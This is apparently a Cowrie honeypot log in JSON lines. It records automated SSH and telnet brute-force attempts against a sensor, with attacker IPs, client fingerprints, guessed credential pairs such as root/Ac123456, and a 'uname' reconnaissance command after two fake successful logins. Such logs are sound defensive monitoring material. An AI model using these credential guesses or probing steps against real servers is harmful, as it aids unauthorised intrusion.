{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60389,"dst_ip":"1.2.3.4","dst_port":23,"session":"87b9a8f0d5b7","protocol":"telnet","message":"New connection: 212.227.125.160:60389 (1.2.3.4:23) [session: 87b9a8f0d5b7]","sensor":"my-vps","timestamp":"2025-08-28T07:22:15.574793Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32974,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a08da3e11a","protocol":"ssh","message":"New connection: 212.227.125.160:32974 (1.2.3.4:22) [session: b2a08da3e11a]","sensor":"my-vps","timestamp":"2025-08-28T07:22:16.773154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:16.774155Z","src_ip":"212.227.125.160","session":"b2a08da3e11a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:16.990899Z","src_ip":"212.227.125.160","session":"b2a08da3e11a"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:17.639181Z","src_ip":"212.227.125.160","session":"b2a08da3e11a"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:18.857386Z","src_ip":"212.227.125.160","session":"b2a08da3e11a"}
{"eventid":"cowrie.session.closed","duration":13.749744176864624,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:20.522434Z","src_ip":"212.227.125.160","session":"ddceb41b5f1c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60530,"dst_ip":"1.2.3.4","dst_port":23,"session":"37752c04173f","protocol":"telnet","message":"New connection: 212.227.125.160:60530 (1.2.3.4:23) [session: 37752c04173f]","sensor":"my-vps","timestamp":"2025-08-28T07:22:20.806397Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46318,"dst_ip":"1.2.3.4","dst_port":22,"session":"419b9ac0f606","protocol":"ssh","message":"New connection: 212.227.235.229:46318 (1.2.3.4:22) [session: 419b9ac0f606]","sensor":"my-vps","timestamp":"2025-08-28T07:22:23.224575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:23.225805Z","src_ip":"212.227.235.229","session":"419b9ac0f606"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:23.475339Z","src_ip":"212.227.235.229","session":"419b9ac0f606"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:24.225416Z","src_ip":"212.227.235.229","session":"419b9ac0f606"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:25.476371Z","src_ip":"212.227.235.229","session":"419b9ac0f606"}
{"eventid":"cowrie.session.closed","duration":14.054526805877686,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:29.629222Z","src_ip":"212.227.125.160","session":"87b9a8f0d5b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60657,"dst_ip":"1.2.3.4","dst_port":23,"session":"8aa231182a75","protocol":"telnet","message":"New connection: 212.227.125.160:60657 (1.2.3.4:23) [session: 8aa231182a75]","sensor":"my-vps","timestamp":"2025-08-28T07:22:29.975141Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45486,"dst_ip":"1.2.3.4","dst_port":22,"session":"adeac4e4c81e","protocol":"ssh","message":"New connection: 212.227.125.160:45486 (1.2.3.4:22) [session: adeac4e4c81e]","sensor":"my-vps","timestamp":"2025-08-28T07:22:33.159552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:33.160735Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:33.382914Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:22:34.277020Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.session.closed","duration":13.638758420944214,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:34.445087Z","src_ip":"212.227.125.160","session":"37752c04173f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60773,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f7752a02ad8","protocol":"telnet","message":"New connection: 212.227.125.160:60773 (1.2.3.4:23) [session: 4f7752a02ad8]","sensor":"my-vps","timestamp":"2025-08-28T07:22:34.638565Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:22:34.970779Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:22:34.971480Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:35.196035Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:35.197012Z","src_ip":"212.227.125.160","session":"adeac4e4c81e"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":60788,"dst_ip":"1.2.3.4","dst_port":22,"session":"b47169b252d5","protocol":"ssh","message":"New connection: 193.32.162.145:60788 (1.2.3.4:22) [session: b47169b252d5]","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.361432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.362222Z","src_ip":"193.32.162.145","session":"b47169b252d5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.392498Z","src_ip":"193.32.162.145","session":"b47169b252d5"}
{"eventid":"cowrie.login.failed","username":"solana","password":"Solana","message":"login attempt [solana/Solana] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.484563Z","src_ip":"193.32.162.145","session":"b47169b252d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41460,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7232e3c2a24","protocol":"ssh","message":"New connection: 212.227.235.229:41460 (1.2.3.4:22) [session: a7232e3c2a24]","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.796643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:39.797611Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:40.052098Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:40.516011Z","src_ip":"193.32.162.145","session":"b47169b252d5"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:22:40.817128Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:22:41.408909Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:22:41.409577Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:41.665331Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:41.666388Z","src_ip":"212.227.235.229","session":"a7232e3c2a24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34145,"dst_ip":"1.2.3.4","dst_port":23,"session":"01551966aada","protocol":"telnet","message":"New connection: 212.227.125.160:34145 (1.2.3.4:23) [session: 01551966aada]","sensor":"my-vps","timestamp":"2025-08-28T07:22:43.034453Z"}
{"eventid":"cowrie.session.closed","duration":13.510729789733887,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:43.485789Z","src_ip":"212.227.125.160","session":"8aa231182a75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60942,"dst_ip":"1.2.3.4","dst_port":23,"session":"f94af0fd8536","protocol":"telnet","message":"New connection: 212.227.125.160:60942 (1.2.3.4:23) [session: f94af0fd8536]","sensor":"my-vps","timestamp":"2025-08-28T07:22:43.626318Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51700,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e445e48fa34","protocol":"telnet","message":"New connection: 212.227.235.229:51700 (1.2.3.4:23) [session: 5e445e48fa34]","sensor":"my-vps","timestamp":"2025-08-28T07:22:46.140427Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58450,"dst_ip":"1.2.3.4","dst_port":23,"session":"baca2329d7e3","protocol":"telnet","message":"New connection: 212.227.235.229:58450 (1.2.3.4:23) [session: baca2329d7e3]","sensor":"my-vps","timestamp":"2025-08-28T07:22:47.176658Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49248,"dst_ip":"1.2.3.4","dst_port":23,"session":"24fc2932d66a","protocol":"telnet","message":"New connection: 212.227.125.160:49248 (1.2.3.4:23) [session: 24fc2932d66a]","sensor":"my-vps","timestamp":"2025-08-28T07:22:48.124588Z"}
{"eventid":"cowrie.session.closed","duration":13.830479860305786,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:48.468972Z","src_ip":"212.227.125.160","session":"4f7752a02ad8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32768,"dst_ip":"1.2.3.4","dst_port":23,"session":"68697f783286","protocol":"telnet","message":"New connection: 212.227.125.160:32768 (1.2.3.4:23) [session: 68697f783286]","sensor":"my-vps","timestamp":"2025-08-28T07:22:48.733352Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33666,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d489ee6d837","protocol":"ssh","message":"New connection: 212.227.125.160:33666 (1.2.3.4:22) [session: 2d489ee6d837]","sensor":"my-vps","timestamp":"2025-08-28T07:22:49.652519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:49.654857Z","src_ip":"212.227.125.160","session":"2d489ee6d837"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:49.874258Z","src_ip":"212.227.125.160","session":"2d489ee6d837"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:50.750075Z","src_ip":"212.227.125.160","session":"2d489ee6d837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37043,"dst_ip":"1.2.3.4","dst_port":23,"session":"df0a5c9bddf8","protocol":"telnet","message":"New connection: 212.227.235.229:37043 (1.2.3.4:23) [session: df0a5c9bddf8]","sensor":"my-vps","timestamp":"2025-08-28T07:22:51.239126Z"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:51.970437Z","src_ip":"212.227.125.160","session":"2d489ee6d837"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":49349,"dst_ip":"1.2.3.4","dst_port":23,"session":"f77faf09e1d4","protocol":"telnet","message":"New connection: 123.31.39.100:49349 (1.2.3.4:23) [session: f77faf09e1d4]","sensor":"my-vps","timestamp":"2025-08-28T07:22:52.133556Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55548,"dst_ip":"1.2.3.4","dst_port":23,"session":"b36a6044b6a0","protocol":"telnet","message":"New connection: 212.227.125.160:55548 (1.2.3.4:23) [session: b36a6044b6a0]","sensor":"my-vps","timestamp":"2025-08-28T07:22:52.179753Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40840,"dst_ip":"1.2.3.4","dst_port":22,"session":"df84096cbcbe","protocol":"ssh","message":"New connection: 212.227.235.229:40840 (1.2.3.4:22) [session: df84096cbcbe]","sensor":"my-vps","timestamp":"2025-08-28T07:22:55.978202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:22:55.979074Z","src_ip":"212.227.235.229","session":"df84096cbcbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:22:56.231774Z","src_ip":"212.227.235.229","session":"df84096cbcbe"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T07:22:57.243443Z","src_ip":"212.227.235.229","session":"df84096cbcbe"}
{"eventid":"cowrie.session.closed","duration":13.977134943008423,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:57.603381Z","src_ip":"212.227.125.160","session":"f94af0fd8536"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32972,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ded4a58de39","protocol":"telnet","message":"New connection: 212.227.125.160:32972 (1.2.3.4:23) [session: 4ded4a58de39]","sensor":"my-vps","timestamp":"2025-08-28T07:22:57.851154Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:22:58.498872Z","src_ip":"212.227.235.229","session":"df84096cbcbe"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":58659,"dst_ip":"1.2.3.4","dst_port":23,"session":"c857e8a5110b","protocol":"telnet","message":"New connection: 123.31.39.100:58659 (1.2.3.4:23) [session: c857e8a5110b]","sensor":"my-vps","timestamp":"2025-08-28T07:23:00.264009Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62344,"dst_ip":"1.2.3.4","dst_port":22,"session":"215020541261","protocol":"ssh","message":"New connection: 217.72.205.35:62344 (1.2.3.4:22) [session: 215020541261]","sensor":"my-vps","timestamp":"2025-08-28T07:23:00.265294Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:00.266314Z","src_ip":"217.72.205.35","session":"215020541261"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":51176,"dst_ip":"1.2.3.4","dst_port":23,"session":"cf3bdc6623ef","protocol":"telnet","message":"New connection: 123.31.39.100:51176 (1.2.3.4:23) [session: cf3bdc6623ef]","sensor":"my-vps","timestamp":"2025-08-28T07:23:01.324126Z"}
